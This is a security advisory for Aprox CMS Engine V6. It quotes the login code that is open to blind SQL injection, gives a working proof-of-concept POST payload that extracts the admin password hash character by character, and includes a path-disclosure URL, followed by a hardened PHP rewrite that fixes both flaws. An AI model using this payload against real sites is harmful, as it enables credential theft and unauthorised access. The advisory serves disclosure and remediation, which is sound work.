# Exploit Title: Aprox CMS Engine V6 Multiple Vulnerabilities
# Date: 03.10.2010
# Author: Stephan Sattler // http://www.solidmedia.de
# Software Website: http://www.aprox.de/
# Software Link: http://www.aprox.de/index.php?page=d&application=zip&dateiname=AproxEngine_v6
# Version: 6
[Vulnerability 1]
# Vulnerable Code:
sql_login.inc line 63-91
if (isset($_GET["action"]) && ($_GET["action"] != "")){$action = $_GET["action"];}
unset($password);
if (isset($_POST["password"]) && ($_POST["password"] != "")){$password = md5($_POST["password"]);}
unset($login);
# $login is taken verbatim from the POST body: no escaping, no validation.
if (isset($_POST["login"]) && ($_POST["login"] != "")){$login = $_POST["login"];}
if (($login=="") or ($password=="")) {echo "Angegeben nicht vollständig!";die;}
$db = mysql_connect(serverhost, user, pass, database);
# $login is interpolated directly into the SQL string; this is the injection point.
$abfrage = "select * from ". suffix ."users where login = '$login'";
$res = mysql_db_query(database, "$abfrage");
# The row count decides whether the password branch is reached, so it acts as
# the true/false oracle for the blind injection described below.
$num = mysql_num_rows($res);
#echo $num;
if ($num >0)
{
#echo "user gefunden,<br>";
$pass = mysql_result($res, 0, 'password');
if ($password == $pass)
{
echo "Alles OK!!!";
$name = mysql_result($res, 0, 'real_name');
$_SESSION["name"] = $name;
$_SESSION["login"] = $login;
$_SESSION["pass"] = $pass;
$login_gepruefter_user = mysql_result($res, 0, 'gepr_mitglied');
$_SESSION["gepruefter_user"] = $login_gepruefter_user;
# closing braces added here to complete the excerpt; the rest of sql_login.inc is not shown
}
}
# Explanation:
$_POST["login"] is copied into $login and interpolated into the SQL string without any escaping or validation before the query is executed.
An attacker can use this for a blind SQL injection attack.
# Exploiting the Vulnerability // PoC:
URL: http://[site]/[path]/index.php?page=sql_login
POST data (example for the admin user that is created after installation):
login=admin' and ascii(substring((SELECT concat(password) from aprox_users limit 0,1),1,1))>'100&password=passwort&Submit=Login
-> If the login succeeds, the first character of the hash is greater than 'd' (ASCII 100).
An attacker can use his/her own login credentials to test the condition, or do it without a user account via benchmark().
Aprox stores failed logins in the session, so this won't prevent an attack.
[Vulnerability 2]
# Path Disclosure
For example: http://[site]/[path]/index.php?id=1 AnD 1=1
provokes a database error, and the resulting PHP error message discloses the full filesystem path of the script.
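The following is an added example, not code from Aprox or from the advisory's author: a hardened rewrite of the login logic quoted above that addresses both findings at once. The login name is bound as a query parameter instead of being interpolated into the SQL string (Vulnerability 1), and database errors are logged server-side rather than echoed, so no file path can reach the browser (Vulnerability 2). An in-memory SQLite database stands in for the MySQL aprox_users table (assumption: the pdo_sqlite extension is available); the table and column names follow the advisory's snippet, and password_hash() replaces the original's unsalted md5().

```php
<?php
// Added example (not Aprox code): hardened replacement for sql_login.inc.
// Assumes PDO with the pdo_sqlite driver; the SQLite table mirrors the
// columns used in the advisory (login, password, real_name, gepr_mitglied).
declare(strict_types=1);

// Fix for Vulnerability 2: error details go to the log, never to the client.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

function connectDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    // Throw on failure so errors are caught and logged instead of leaking.
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE aprox_users (
        login TEXT PRIMARY KEY, password TEXT, real_name TEXT, gepr_mitglied INTEGER)');
    // Constructed sample user; password_hash() replaces the original md5().
    $ins = $db->prepare('INSERT INTO aprox_users VALUES (:l, :p, :n, :g)');
    $ins->execute([
        ':l' => 'admin',
        ':p' => password_hash('passwort', PASSWORD_DEFAULT),
        ':n' => 'Administrator',
        ':g' => 1,
    ]);
    return $db;
}

/**
 * Returns the session values to set on success, or null on failure.
 * $login and $password are the raw POST values.
 */
function authenticate(PDO $db, string $login, string $password): ?array
{
    if ($login === '' || $password === '') {
        return null;
    }
    try {
        // Fix for Vulnerability 1: the login value is a bound parameter, so a
        // quote or "and ..." clause inside it is compared literally, never parsed.
        $stmt = $db->prepare(
            'SELECT password, real_name, gepr_mitglied FROM aprox_users WHERE login = :login');
        $stmt->execute([':login' => $login]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // Detail stays server-side; the caller only sees a generic failure.
        error_log('login query failed: ' . $e->getMessage());
        return null;
    }
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;
    }
    // The password hash is deliberately not stored in the session.
    return [
        'name' => $row['real_name'],
        'login' => $login,
        'gepruefter_user' => (int) $row['gepr_mitglied'],
    ];
}

// Demonstration with constructed inputs when run from the command line.
if (PHP_SAPI === 'cli') {
    $db = connectDb();
    var_dump(authenticate($db, 'admin', 'passwort') !== null);
    var_dump(authenticate($db, 'admin', 'wrong') !== null);
    // A login name containing SQL syntax is plain data under parameter binding.
    var_dump(authenticate($db, "admin' and 1=1", 'passwort') !== null);
}
```

Run it with the PHP CLI: only the first call should authenticate, and the third call shows that the same kind of input the advisory injects into the original query simply matches no row. The time-based variant the advisory mentions (benchmark()) is closed by the same change, since the bound value can no longer introduce a function call into the statement.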